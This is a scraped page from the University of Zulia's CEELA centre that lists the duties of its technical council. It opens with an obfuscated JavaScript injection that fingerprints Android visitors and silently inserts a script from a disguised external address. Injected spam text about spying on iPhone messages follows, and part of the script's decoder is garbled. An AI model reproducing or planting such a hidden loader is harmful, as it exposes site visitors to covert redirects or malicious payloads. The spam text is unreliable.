;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Consejo técnico - Centro Experimental de Estudios Latinoamericanos <br /> 'Dr. Gastón Parra Luzardo' spy on messages from iphone 6s spy see more visit web page article source
Universidad del Zulia
Correo LUZMapa del sitio
20 de octubre de 2018
 
Mas del CEELA
Descargas
Eventos
Documentos
Enlaces
 
 
  images/stories/botones/boton-directorio.jpg  
  images/stories/botones/boton-bonus.jpg  
  /images/stories/botones/boton-nomina.jpg  

tope19_exteriores

Agrandar texto   Reducir texto   Reestablecer texto    
Consejo técnico Imprimir Correo

El Consejo Técnico, entre sus atribuciones naturales, deberá:

 

  • Coordinar las labores de enseñanza, investigación y todas las demás de orden académico de acuerdo con lo dispuesto por el Consejo Directivo.

 

  • Conocer y aprobar, para ser elevado al Consejo Central de Postgrado de la Universidad del Zulia, los asuntos relacionados con los cursos de posgrado.

 

  • Elaborar los reglamentos, normas, planes y programas anuales de estudios e investigación del Ceela y someterlos a la aprobación de los órganos legales competentes.

 

  • Elaborar el proyecto del presupuesto anual del Ceela y hacerlo del conocimiento del Consejo Directivo a través del Vicerrector (a) Académico (a).

 

  • Conocer y aprobar los proyectos de investigación que realizará el Ceela y velar por su adecuación respecto a los fines y objetivos de éste.

 

 




^ Subir